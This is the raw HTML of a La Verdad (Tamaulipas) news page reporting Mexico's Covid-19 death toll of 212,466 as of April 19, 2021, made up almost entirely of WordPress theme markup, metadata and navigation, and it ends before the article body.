<!doctype html>
<!--[if lt IE 7]> <html class="no-js lt-ie9 lt-ie8 lt-ie7" lang="es"> <![endif]-->
<!--[if IE 7]>    <html class="no-js lt-ie9 lt-ie8" lang="es"> <![endif]-->
<!--[if IE 8]>    <html class="no-js lt-ie9" lang="es"> <![endif]-->
<!--[if IE 9]>    <html class="no-js lt-ie10" lang="es"> <![endif]-->
<!--[if gt IE 8]><!--> <html class="no-js" lang="es"> <!--<![endif]-->
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
    <meta name='viewport' content='width=device-width, initial-scale=1, user-scalable=yes' />
    <link rel="profile" href="http://gmpg.org/xfn/11" />
    <link rel="pingback" href="https://laverdad.com.mx/xmlrpc.php" />
    <title>Cifra de muertes por Covid-19 en México asciende a 212,466: SSA &#8211; La Verdad</title>
<meta property="og:type" content="article">
<meta property="og:title" content="Cifra de muertes por Covid-19 en México asciende a 212,466: SSA">
<meta property="og:site_name" content="La Verdad">
<meta property="og:description" content="&amp;nbsp; CD. DE MEXICO, 19 DE ABRIL DE 2021.-La Secretaría de Salud federal reportó este lunes 19 de abril 1,308">
<meta property="og:url" content="https://laverdad.com.mx/2021/04/cifra-de-muertes-por-covid-19-en-mexico-asciende-a-212466-ssa/">
<meta property="og:locale" content="es_ES">
<meta property="og:image" content="https://laverdad.com.mx/wp-content/uploads/2021/04/19MUER.jpg">
<meta property="og:image:height" content="236">
<meta property="og:image:width" content="420">
<meta property="article:published_time" content="2021-04-20T03:51:44+00:00">
<meta property="article:modified_time" content="2021-04-20T03:51:44+00:00">
<meta property="article:section" content="Nacional">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:title" content="Cifra de muertes por Covid-19 en México asciende a 212,466: SSA">
<meta name="twitter:description" content="&nbsp; CD. DE MEXICO, 19 DE ABRIL DE 2021.-La Secretaría de Salud federal reportó este lunes 19 de abril 1,308">
<meta name="twitter:url" content="https://laverdad.com.mx/2021/04/cifra-de-muertes-por-covid-19-en-mexico-asciende-a-212466-ssa/">
<meta name="twitter:site" content="">
<meta name="twitter:image:src" content="https://laverdad.com.mx/wp-content/uploads/2021/04/19MUER.jpg">
<meta name="twitter:image:width" content="420">
<meta name="twitter:image:height" content="236">
			<script type="text/javascript">
              var jnews_ajax_url = '/?ajax-request=jnews'
			</script>
			<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="La Verdad &raquo; Feed" href="https://laverdad.com.mx/feed/" />
<link rel="alternate" type="application/rss+xml" title="La Verdad &raquo; Feed de los comentarios" href="https://laverdad.com.mx/comments/feed/" />
<link rel="alternate" type="application/rss+xml" title="La Verdad &raquo; Comentario Cifra de muertes por Covid-19 en México asciende a 212,466: SSA del feed" href="https://laverdad.com.mx/2021/04/cifra-de-muertes-por-covid-19-en-mexico-asciende-a-212466-ssa/feed/" />
		<script type="text/javascript">
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/13.0.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/13.0.0\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/laverdad.com.mx\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.5.4"}};
			!function(e,a,t){var n,r,o,i=a.createElement("canvas"),p=i.getContext&&i.getContext("2d");function s(e,t){var a=String.fromCharCode;p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,e),0,0);e=i.toDataURL();return p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,t),0,0),e===i.toDataURL()}function c(e){var t=a.createElement("script");t.src=e,t.defer=t.type="text/javascript",a.getElementsByTagName("head")[0].appendChild(t)}for(o=Array("flag","emoji"),t.supports={everything:!0,everythingExceptFlag:!0},r=0;r<o.length;r++)t.supports[o[r]]=function(e){if(!p||!p.fillText)return!1;switch(p.textBaseline="top",p.font="600 32px Arial",e){case"flag":return s([127987,65039,8205,9895,65039],[127987,65039,8203,9895,65039])?!1:!s([55356,56826,55356,56819],[55356,56826,8203,55356,56819])&&!s([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]);case"emoji":return!s([55357,56424,8205,55356,57212],[55357,56424,8203,55356,57212])}return!1}(o[r]),t.supports.everything=t.supports.everything&&t.supports[o[r]],"flag"!==o[r]&&(t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&t.supports[o[r]]);t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&!t.supports.flag,t.DOMReady=!1,t.readyCallback=function(){t.DOMReady=!0},t.supports.everything||(n=function(){t.readyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",function(){"complete"===a.readyState&&t.readyCallback()})),(n=t.source||{}).concatemoji?c(n.concatemoji):n.wpemoji&&n.twemoji&&(c(n.twemoji),c(n.wpemoji)))}(window,document,window._wpemojiSettings);
		</script>
		<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
	<link rel='stylesheet' id='wp-block-library-css'  href='https://laverdad.com.mx/wp-includes/css/dist/block-library/style.min.css?ver=5.5.4' type='text/css' media='all' />
<style id='wp-block-library-inline-css' type='text/css'>
.has-text-align-justify{text-align:justify;}
</style>
<link rel='stylesheet' id='jnews-video-css'  href='https://laverdad.com.mx/wp-content/plugins/jnews-video/assets/css/plugin.css?ver=7.0.8' type='text/css' media='all' />
<link rel='stylesheet' id='jnews-video-darkmode-css'  href='https://laverdad.com.mx/wp-content/plugins/jnews-video/assets/css/darkmode.css?ver=7.0.8' type='text/css' media='all' />
<link rel='stylesheet' id='jltma-wpf-css'  href='https://laverdad.com.mx/wp-content/plugins/prettyphoto/css/prettyPhoto.css?ver=5.5.4' type='text/css' media='all' />
<link rel='stylesheet' id='wpemfb-lightbox-css'  href='https://laverdad.com.mx/wp-content/plugins/wp-embed-facebook/templates/lightbox/css/lightbox.css?ver=3.0.10' type='text/css' media='all' />
<link rel='stylesheet' id='js_composer_front-css'  href='https://laverdad.com.mx/wp-content/plugins/js_composer/assets/css/js_composer.min.css?ver=6.4.1' type='text/css' media='all' />
<link rel='stylesheet' id='jeg_customizer_font-css'  href='//fonts.googleapis.com/css?family=Poppins%3Aregular%2C500%2C600%7COpen+Sans%3Aregular%2C600%2C700&#038;display=swap&#038;ver=1.2.5' type='text/css' media='all' />
<link rel='stylesheet' id='mediaelement-css'  href='https://laverdad.com.mx/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css?ver=4.2.13-9993131' type='text/css' media='all' />
<link rel='stylesheet' id='wp-mediaelement-css'  href='https://laverdad.com.mx/wp-includes/js/mediaelement/wp-mediaelement.min.css?ver=5.5.4' type='text/css' media='all' />
<link rel='stylesheet' id='jnews-frontend-css'  href='https://laverdad.com.mx/wp-content/themes/jnews/assets/dist/frontend.min.css?ver=7.1.6' type='text/css' media='all' />
<link rel='stylesheet' id='jnews-style-css'  href='https://laverdad.com.mx/wp-content/themes/jnews/style.css?ver=7.1.6' type='text/css' media='all' />
<link rel='stylesheet' id='jnews-darkmode-css'  href='https://laverdad.com.mx/wp-content/themes/jnews/assets/css/darkmode.css?ver=7.1.6' type='text/css' media='all' />
<link rel='stylesheet' id='jnews-scheme-css'  href='https://laverdad.com.mx/wp-content/themes/jnews/data/import/tech/scheme.css?ver=7.1.6' type='text/css' media='all' />
<link rel='stylesheet' id='jetpack_css-css'  href='https://laverdad.com.mx/wp-content/plugins/jetpack/css/jetpack.css?ver=9.4' type='text/css' media='all' />
<link rel='stylesheet' id='jnews-social-login-style-css'  href='https://laverdad.com.mx/wp-content/plugins/jnews-social-login/assets/css/plugin.css?ver=7.0.3' type='text/css' media='all' />
<link rel='stylesheet' id='jnews-select-share-css'  href='https://laverdad.com.mx/wp-content/plugins/jnews-social-share/assets/css/plugin.css' type='text/css' media='all' />
<script type='text/javascript' src='https://laverdad.com.mx/wp-content/plugins/shortcode-for-current-date/dist/script.js?ver=5.5.4' id='shortcode-for-current-date-script-js'></script>
<script type='text/javascript' src='https://laverdad.com.mx/wp-includes/js/jquery/jquery.js?ver=1.12.4-wp' id='jquery-core-js'></script>
<script type='text/javascript' src='https://laverdad.com.mx/wp-content/plugins/wp-embed-facebook/templates/lightbox/js/lightbox.min.js?ver=3.0.10' id='wpemfb-lightbox-js'></script>
<script type='text/javascript' id='wpemfb-fbjs-js-extra'>
/* <![CDATA[ */
var WEF = {"local":"es_ES","version":"v6.0","fb_id":""};
/* ]]> */
</script>
<script type='text/javascript' src='https://laverdad.com.mx/wp-content/plugins/wp-embed-facebook/inc/js/fb.min.js?ver=3.0.10' id='wpemfb-fbjs-js'></script>
<link rel="https://api.w.org/" href="https://laverdad.com.mx/wp-json/" /><link rel="alternate" type="application/json" href="https://laverdad.com.mx/wp-json/wp/v2/posts/78483" /><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://laverdad.com.mx/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://laverdad.com.mx/wp-includes/wlwmanifest.xml" /> 
<meta name="generator" content="WordPress 5.5.4" />
<link rel="canonical" href="https://laverdad.com.mx/2021/04/cifra-de-muertes-por-covid-19-en-mexico-asciende-a-212466-ssa/" />
<link rel='shortlink' href='https://laverdad.com.mx/?p=78483' />
<link rel="alternate" type="application/json+oembed" href="https://laverdad.com.mx/wp-json/oembed/1.0/embed?url=https%3A%2F%2Flaverdad.com.mx%2F2021%2F04%2Fcifra-de-muertes-por-covid-19-en-mexico-asciende-a-212466-ssa%2F" />
<link rel="alternate" type="text/xml+oembed" href="https://laverdad.com.mx/wp-json/oembed/1.0/embed?url=https%3A%2F%2Flaverdad.com.mx%2F2021%2F04%2Fcifra-de-muertes-por-covid-19-en-mexico-asciende-a-212466-ssa%2F&#038;format=xml" />
<style type='text/css'>img#wpstats{display:none}</style><meta name="generator" content="Powered by WPBakery Page Builder - drag and drop page builder for WordPress."/>

<!-- Jetpack Open Graph Tags -->
<meta property="og:type" content="article" />
<meta property="og:title" content="Cifra de muertes por Covid-19 en México asciende a 212,466: SSA" />
<meta property="og:url" content="https://laverdad.com.mx/2021/04/cifra-de-muertes-por-covid-19-en-mexico-asciende-a-212466-ssa/" />
<meta property="og:description" content="&nbsp; CD. DE MEXICO, 19 DE ABRIL DE 2021.-La Secretaría de Salud federal reportó este lunes 19 de abril 1,308 nuevos casos confirmados de Covid-19 en México, dando un acumulado de 2 millones 306,9…" />
<meta property="article:published_time" content="2021-04-20T03:51:44+00:00" />
<meta property="article:modified_time" content="2021-04-20T03:51:44+00:00" />
<meta property="og:site_name" content="La Verdad" />
<meta property="og:image" content="https://laverdad.com.mx/wp-content/uploads/2021/04/19MUER.jpg" />
<meta property="og:image:width" content="420" />
<meta property="og:image:height" content="236" />
<meta property="og:locale" content="es_ES" />
<meta name="twitter:creator" content="@laverdad_tam" />
<meta name="twitter:site" content="@laverdad_tam" />
<meta name="twitter:text:title" content="Cifra de muertes por Covid-19 en México asciende a 212,466: SSA" />
<meta name="twitter:image" content="https://laverdad.com.mx/wp-content/uploads/2021/04/19MUER.jpg?w=640" />
<meta name="twitter:card" content="summary_large_image" />

<!-- End Jetpack Open Graph Tags -->
<script type='application/ld+json'>{"@context":"http:\/\/schema.org","@type":"Organization","@id":"https:\/\/laverdad.com.mx\/#organization","url":"https:\/\/laverdad.com.mx\/","name":"","logo":{"@type":"ImageObject","url":""},"sameAs":["https:\/\/www.facebook.com\/laverdad.tamps\/","https:\/\/twitter.com\/laverdad_tam"]}</script>
<script type='application/ld+json'>{"@context":"http:\/\/schema.org","@type":"WebSite","@id":"https:\/\/laverdad.com.mx\/#website","url":"https:\/\/laverdad.com.mx\/","name":"","potentialAction":{"@type":"SearchAction","target":"https:\/\/laverdad.com.mx\/?s={search_term_string}","query-input":"required name=search_term_string"}}</script>
<link rel="icon" href="https://laverdad.com.mx/wp-content/uploads/2020/02/fav-75x75.png" sizes="32x32" />
<link rel="icon" href="https://laverdad.com.mx/wp-content/uploads/2020/02/fav.png" sizes="192x192" />
<link rel="apple-touch-icon" href="https://laverdad.com.mx/wp-content/uploads/2020/02/fav.png" />
<meta name="msapplication-TileImage" content="https://laverdad.com.mx/wp-content/uploads/2020/02/fav.png" />
<script></script><style id="jeg_dynamic_css" type="text/css" data-type="jeg_custom-css">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</style><style type="text/css">
					.no_thumbnail .jeg_thumb,
					.thumbnail-container.no_thumbnail {
					    display: none !important;
					}
					.jeg_search_result .jeg_pl_xs_3.no_thumbnail .jeg_postblock_content,
					.jeg_sidefeed .jeg_pl_xs_3.no_thumbnail .jeg_postblock_content,
					.jeg_pl_sm.no_thumbnail .jeg_postblock_content {
					    margin-left: 0;
					}
					.jeg_postblock_11 .no_thumbnail .jeg_postblock_content,
					.jeg_postblock_12 .no_thumbnail .jeg_postblock_content,
					.jeg_postblock_12.jeg_col_3o3 .no_thumbnail .jeg_postblock_content  {
					    margin-top: 0;
					}
					.jeg_postblock_15 .jeg_pl_md_box.no_thumbnail .jeg_postblock_content,
					.jeg_postblock_19 .jeg_pl_md_box.no_thumbnail .jeg_postblock_content,
					.jeg_postblock_24 .jeg_pl_md_box.no_thumbnail .jeg_postblock_content,
					.jeg_sidefeed .jeg_pl_md_box .jeg_postblock_content {
					    position: relative;
					}
					.jeg_postblock_carousel_2 .no_thumbnail .jeg_post_title a,
					.jeg_postblock_carousel_2 .no_thumbnail .jeg_post_title a:hover,
					.jeg_postblock_carousel_2 .no_thumbnail .jeg_post_meta .fa {
					    color: #212121 !important;
					} 
				</style>		<style type="text/css" id="wp-custom-css">
			.content-inner br{  
display:none;
}

.content-inner p{
	display:block;
	clear:both;
	text-align:justify;
}

.eapps-link{display:none!important;}		</style>
		<noscript><style> .wpb_animate_when_almost_visible { opacity: 1; }</style></noscript></head>
<body class="post-template-default single single-post postid-78483 single-format-standard wp-embed-responsive jeg_toggle_dark jeg_single_tpl_1 jnews jsc_normal wpb-js-composer js-comp-ver-6.4.1 vc_responsive">

    
    
    <div class="jeg_ad jeg_ad_top jnews_header_top_ads">
        <div class='ads-wrapper  '></div>    </div>

    <!-- The Main Wrapper
    ============================================= -->
    <div class="jeg_viewport">

        
        <div class="jeg_header_wrapper">
            <div class="jeg_header_instagram_wrapper">
    </div>

<!-- HEADER -->
<div class="jeg_header normal">
    <div class="jeg_topbar jeg_container dark">
    <div class="container">
        <div class="jeg_nav_row">
            
                <div class="jeg_nav_col jeg_nav_left  jeg_nav_grow">
                    <div class="item_wrap jeg_nav_alignleft">
                        <div class="jeg_nav_item jeg_top_date">
    martes 20  abril , 2021 12:57 AM</div>                    </div>
                </div>

                
                <div class="jeg_nav_col jeg_nav_center  jeg_nav_normal">
                    <div class="item_wrap jeg_nav_aligncenter">
                        			<div
				class="jeg_nav_item socials_widget jeg_social_icon_block nobg">
				<a href="https://www.facebook.com/laverdad.tamps/" target='_blank' class="jeg_facebook"><i class="fa fa-facebook"></i> </a><a href="https://twitter.com/laverdad_tam" target='_blank' class="jeg_twitter"><i class="fa fa-twitter"></i> </a>			</div>
			                    </div>
                </div>

                
                <div class="jeg_nav_col jeg_nav_right  jeg_nav_normal">
                    <div class="item_wrap jeg_nav_alignright">
                        <!-- Search Icon -->
<div class="jeg_nav_item jeg_search_wrapper search_icon jeg_search_popup_expand">
    <a href="#" class="jeg_search_toggle"><i class="fa fa-search"></i></a>
    <form action="https://laverdad.com.mx/" method="get" class="jeg_search_form" target="_top">
    <input name="s" class="jeg_search_input" placeholder="Search..." type="text" value="" autocomplete="off">
    <button type="submit" class="jeg_search_button btn"><i class="fa fa-search"></i></button>
</form>
<!-- jeg_search_hide with_result no_result -->
<div class="jeg_search_result jeg_search_hide with_result">
    <div class="search-result-wrapper">
    </div>
    <div class="search-link search-noresult">
        No Result    </div>
    <div class="search-link search-all-button">
        <i class="fa fa-search"></i> View All Result    </div>
</div></div>                    </div>
                </div>

                        </div>
    </div>
</div><!-- /.jeg_container --><div class="jeg_midbar jeg_container normal">
    <div class="container">
        <div class="jeg_nav_row">
            
                <div class="jeg_nav_col jeg_nav_left jeg_nav_grow">
                    <div class="item_wrap jeg_nav_alignleft">
                        <div class="jeg_nav_item jeg_logo jeg_desktop_logo">
			<div class="site-title">
	    	<a href="https://laverdad.com.mx/" style="padding: 0 0 0 0;">
	    	    <img class='jeg_logo_img' src="https://laverdad.com.mx/wp-content/uploads/2020/01/verdad_tamaulipas.jpg" srcset="https://laverdad.com.mx/wp-content/uploads/2020/01/verdad_tamaulipas.jpg 1x, https://laverdad.com.mx/wp-content/uploads/2020/01/verdad_tamaulipas.jpg 2x" alt="La Verdad de Tamaulipas"data-light-src="https://laverdad.com.mx/wp-content/uploads/2020/01/verdad_tamaulipas.jpg" data-light-srcset="https://laverdad.com.mx/wp-content/uploads/2020/01/verdad_tamaulipas.jpg 1x, https://laverdad.com.mx/wp-content/uploads/2020/01/verdad_tamaulipas.jpg 2x" data-dark-src="https://laverdad.com.mx/wp-content/uploads/2020/01/verdad_tamaulipas.jpg" data-dark-srcset="https://laverdad.com.mx/wp-content/uploads/2020/01/verdad_tamaulipas.jpg 1x, https://laverdad.com.mx/wp-content/uploads/2020/01/verdad_tamaulipas.jpg 2x">	    	</a>
	    </div>
	</div>                    </div>
                </div>

                
                <div class="jeg_nav_col jeg_nav_center jeg_nav_normal">
                    <div class="item_wrap jeg_nav_aligncenter">
                                            </div>
                </div>

                
                <div class="jeg_nav_col jeg_nav_right jeg_nav_normal">
                    <div class="item_wrap jeg_nav_alignright">
                        <div class="jeg_nav_item jeg_ad jeg_ad_top jnews_header_ads">
    <div class='ads-wrapper  '><a href=''  class='adlink ads_image '>
                                    <img src='https://laverdad.com.mx/wp-content/themes/jnews/assets/img/jeg-empty.png' class='lazyload' data-src='https://laverdad.com.mx/wp-content/uploads/2020/04/g1.jpg' alt='Advertisement' data-pin-no-hover="true">
                                </a></div></div>                    </div>
                </div>

                        </div>
    </div>
</div><div class="jeg_bottombar jeg_navbar jeg_container jeg_navbar_wrapper jeg_navbar_normal jeg_navbar_shadow jeg_navbar_dark">
    <div class="container">
        <div class="jeg_nav_row">
            
                <div class="jeg_nav_col jeg_nav_left jeg_nav_normal">
                    <div class="item_wrap jeg_nav_alignleft">
                        <div class="jeg_main_menu_wrapper">
<div class="jeg_nav_item jeg_mainmenu_wrap"><ul class="jeg_menu jeg_main_menu jeg_menu_style_4" data-animation="animate"><li id="menu-item-277" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home menu-item-277 bgnav" data-item-row="default" ><a href="https://laverdad.com.mx/">Portada</a></li>
<li id="menu-item-278" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-278 bgnav" data-item-row="default" ><a href="https://laverdad.com.mx/category/opinion/">Opinión</a></li>
<li id="menu-item-279" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-279 bgnav" data-item-row="default" ><a href="https://laverdad.com.mx/category/local/">Local</a></li>
<li id="menu-item-281" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-281 bgnav" data-item-row="default" ><a href="https://laverdad.com.mx/category/tamaulipas/">Tamaulipas</a></li>
<li id="menu-item-282" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-282 bgnav" data-item-row="default" ><a href="https://laverdad.com.mx/category/nacional/">Nacional</a></li>
<li id="menu-item-283" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-283 bgnav" data-item-row="default" ><a href="https://laverdad.com.mx/category/mundo/">Mundo</a></li>
<li id="menu-item-280" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-280 bgnav" data-item-row="default" ><a href="https://laverdad.com.mx/category/seguridad/">Seguridad</a></li>
<li id="menu-item-284" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-284 bgnav" data-item-row="default" ><a href="https://laverdad.com.mx/category/deportes/">Deportes</a></li>
<li id="menu-item-285" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-285 bgnav" data-item-row="default" ><a href="https://laverdad.com.mx/category/espectaculos/">Espectáculos</a></li>
<li id="menu-item-398" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-398 bgnav" data-item-row="default" ><a href="https://laverdad.com.mx/category/entretenimiento/">Entretenimiento</a></li>
</ul></div></div>
                    </div>
                </div>

                
                <div class="jeg_nav_col jeg_nav_center jeg_nav_normal">
                    <div class="item_wrap jeg_nav_aligncenter">
                                            </div>
                </div>

                
                <div class="jeg_nav_col jeg_nav_right jeg_nav_grow">
                    <div class="item_wrap jeg_nav_alignright">
                                            </div>
                </div>

                        </div>
    </div>
</div></div><!-- /.jeg_header -->        </div>

        <div class="jeg_header_sticky">
            <div class="sticky_blankspace"></div>
<div class="jeg_header normal">
    <div class="jeg_container">
        <div data-mode="fixed" class="jeg_stickybar jeg_navbar jeg_navbar_wrapper jeg_navbar_normal jeg_navbar_dark">
            <div class="container">
    <div class="jeg_nav_row">
        
            <div class="jeg_nav_col jeg_nav_left jeg_nav_grow">
                <div class="item_wrap jeg_nav_alignleft">
                    <div class="jeg_main_menu_wrapper">
<div class="jeg_nav_item jeg_mainmenu_wrap"><ul class="jeg_menu jeg_main_menu jeg_menu_style_4" data-animation="animate"><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home menu-item-277 bgnav" data-item-row="default" ><a href="https://laverdad.com.mx/">Portada</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-278 bgnav" data-item-row="default" ><a href="https://laverdad.com.mx/category/opinion/">Opinión</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-279 bgnav" data-item-row="default" ><a href="https://laverdad.com.mx/category/local/">Local</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-281 bgnav" data-item-row="default" ><a href="https://laverdad.com.mx/category/tamaulipas/">Tamaulipas</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-282 bgnav" data-item-row="default" ><a href="https://laverdad.com.mx/category/nacional/">Nacional</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-283 bgnav" data-item-row="default" ><a href="https://laverdad.com.mx/category/mundo/">Mundo</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-280 bgnav" data-item-row="default" ><a href="https://laverdad.com.mx/category/seguridad/">Seguridad</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-284 bgnav" data-item-row="default" ><a href="https://laverdad.com.mx/category/deportes/">Deportes</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-285 bgnav" data-item-row="default" ><a href="https://laverdad.com.mx/category/espectaculos/">Espectáculos</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-398 bgnav" data-item-row="default" ><a href="https://laverdad.com.mx/category/entretenimiento/">Entretenimiento</a></li>
</ul></div></div>
                </div>
            </div>

            
            <div class="jeg_nav_col jeg_nav_center jeg_nav_normal">
                <div class="item_wrap jeg_nav_aligncenter">
                                    </div>
            </div>

            
            <div class="jeg_nav_col jeg_nav_right jeg_nav_normal">
                <div class="item_wrap jeg_nav_alignright">
                    			<div
				class="jeg_nav_item socials_widget jeg_social_icon_block nobg">
				<a href="https://www.facebook.com/laverdad.tamps/" target='_blank' class="jeg_facebook"><i class="fa fa-facebook"></i> </a><a href="https://twitter.com/laverdad_tam" target='_blank' class="jeg_twitter"><i class="fa fa-twitter"></i> </a>			</div>
			<div class="jeg_separator separator4"></div><!-- Search Icon -->
<div class="jeg_nav_item jeg_search_wrapper search_icon jeg_search_popup_expand">
    <a href="#" class="jeg_search_toggle"><i class="fa fa-search"></i></a>
    <form action="https://laverdad.com.mx/" method="get" class="jeg_search_form" target="_top">
    <input name="s" class="jeg_search_input" placeholder="Search..." type="text" value="" autocomplete="off">
    <button type="submit" class="jeg_search_button btn"><i class="fa fa-search"></i></button>
</form>
<!-- jeg_search_hide with_result no_result -->
<div class="jeg_search_result jeg_search_hide with_result">
    <div class="search-result-wrapper">
    </div>
    <div class="search-link search-noresult">
        No Result    </div>
    <div class="search-link search-all-button">
        <i class="fa fa-search"></i> View All Result    </div>
</div></div>                </div>
            </div>

                </div>
</div>        </div>
    </div>
</div>
        </div>

        <div class="jeg_navbar_mobile_wrapper">
            <div class="jeg_navbar_mobile" data-mode="scroll">
    <div class="jeg_mobile_bottombar jeg_mobile_midbar jeg_container dark">
    <div class="container">
        <div class="jeg_nav_row">
            
                <div class="jeg_nav_col jeg_nav_left jeg_nav_normal">
                    <div class="item_wrap jeg_nav_alignleft">
                        <div class="jeg_nav_item">
    <a href="#" class="toggle_btn jeg_mobile_toggle"><i class="fa fa-bars"></i></a>
</div>                    </div>
                </div>

                
                <div class="jeg_nav_col jeg_nav_center jeg_nav_grow">
                    <div class="item_wrap jeg_nav_aligncenter">
                        <div class="jeg_nav_item jeg_mobile_logo">
			<div class="site-title">
	    	<a href="https://laverdad.com.mx/">
		        <img class='jeg_logo_img' src="https://laverdad.com.mx/wp-content/uploads/2020/01/verdad_tamaulipas.jpg" srcset="https://laverdad.com.mx/wp-content/uploads/2020/01/verdad_tamaulipas.jpg 1x, https://laverdad.com.mx/wp-content/uploads/2020/01/verdad_tamaulipas.jpg 2x" alt="La Verdad"data-light-src="https://laverdad.com.mx/wp-content/uploads/2020/01/verdad_tamaulipas.jpg" data-light-srcset="https://laverdad.com.mx/wp-content/uploads/2020/01/verdad_tamaulipas.jpg 1x, https://laverdad.com.mx/wp-content/uploads/2020/01/verdad_tamaulipas.jpg 2x" data-dark-src="https://aseo.mx/laverdad/wp-content/uploads/2020/01/verdad_tamaulipas.jpg" data-dark-srcset="https://aseo.mx/laverdad/wp-content/uploads/2020/01/verdad_tamaulipas.jpg 1x, https://aseo.mx/laverdad/wp-content/uploads/2020/01/verdad_tamaulipas.jpg 2x">		    </a>
	    </div>
	</div>                    </div>
                </div>

                
                <div class="jeg_nav_col jeg_nav_right jeg_nav_normal">
                    <div class="item_wrap jeg_nav_alignright">
                        <div class="jeg_nav_item jeg_search_wrapper jeg_search_popup_expand">
    <a href="#" class="jeg_search_toggle"><i class="fa fa-search"></i></a>
	<form action="https://laverdad.com.mx/" method="get" class="jeg_search_form" target="_top">
    <input name="s" class="jeg_search_input" placeholder="Search..." type="text" value="" autocomplete="off">
    <button type="submit" class="jeg_search_button btn"><i class="fa fa-search"></i></button>
</form>
<!-- jeg_search_hide with_result no_result -->
<div class="jeg_search_result jeg_search_hide with_result">
    <div class="search-result-wrapper">
    </div>
    <div class="search-link search-noresult">
        No Result    </div>
    <div class="search-link search-all-button">
        <i class="fa fa-search"></i> View All Result    </div>
</div></div>                    </div>
                </div>

                        </div>
    </div>
</div></div>
<div class="sticky_blankspace" style="height: 60px;"></div>        </div>    <div class="post-wrapper">

        <div class="post-wrap" >

            
            <div class="jeg_main ">
                <div class="jeg_container">
                    <div class="jeg_content jeg_singlepage">

    <div class="container">

        <div class="jeg_ad jeg_article jnews_article_top_ads">
            <div class='ads-wrapper  '></div>        </div>

        <div class="row">
            <div class="jeg_main_content col-md-8">
                <div class="jeg_inner_content">
                    
                                                <div class="jeg_breadcrumbs jeg_breadcrumb_container">
                            <div id="breadcrumbs"><span class="">
                <a href="https://laverdad.com.mx">Home</a>
            </span><i class="fa fa-angle-right"></i><span class="breadcrumb_last_link">
                <a href="https://laverdad.com.mx/category/nacional/">Nacional</a>
            </span></div>                        </div>
                        
                        <div class="entry-header">
    	                    
                            <h1 class="jeg_post_title">Cifra de muertes por Covid-19 en México asciende a 212,466: SSA</h1>

                            
                            <div class="jeg_meta_container"><div class="jeg_post_meta jeg_post_meta_1">

	<div class="meta_left">
									<div class="jeg_meta_author">
										<span class="meta_text">Por:</span>
					Agencias				</div>
					
					<div class="jeg_meta_date">
				<a href="https://laverdad.com.mx/2021/04/cifra-de-muertes-por-covid-19-en-mexico-asciende-a-212466-ssa/">abril 19, 2021</a>
			</div>
		
		
			</div>

	<div class="meta_right">
					</div>
</div>
</div>
                        </div>

                        <div class="jeg_featured featured_image"><a href="https://laverdad.com.mx/wp-content/uploads/2021/04/19MUER.jpg"><div class="thumbnail-container animate-lazy" style="padding-bottom:56.19%"><img width="420" height="236" src="https://laverdad.com.mx/wp-content/themes/jnews/assets/img/jeg-empty.png" class="attachment-jnews-featured-750 size-jnews-featured-750 lazyload wp-post-image" alt="Cifra de muertes por Covid-19 en México asciende a 212,466: SSA" loading="lazy" sizes="(max-width: 420px) 100vw, 420px" data-src="https://laverdad.com.mx/wp-content/uploads/2021/04/19MUER.jpg" data-srcset="https://laverdad.com.mx/wp-content/uploads/2021/04/19MUER.jpg 420w, https://laverdad.com.mx/wp-content/uploads/2021/04/19MUER-300x169.jpg 300w" data-sizes="auto" data-expand="700" /></div><p class="wp-caption-text">Se reportó un acumulado de 212,466 fallecimientos, tras registrarse 127 nuevas defunciones, respecto a las notificadas el domingo</p></a></div>
                        <div class="jeg_share_top_container"><div class="jeg_share_button clearfix">
                <div class="jeg_share_stats">
                    <div class="jeg_share_count">
                        <div class="counts">12</div>
                        <span class="sharetext">SHARES</span>
                    </div>
                    <div class="jeg_views_count">
                    <div class="counts">108</div>
                    <span class="sharetext">VIEWS</span>
                </div>
                </div>
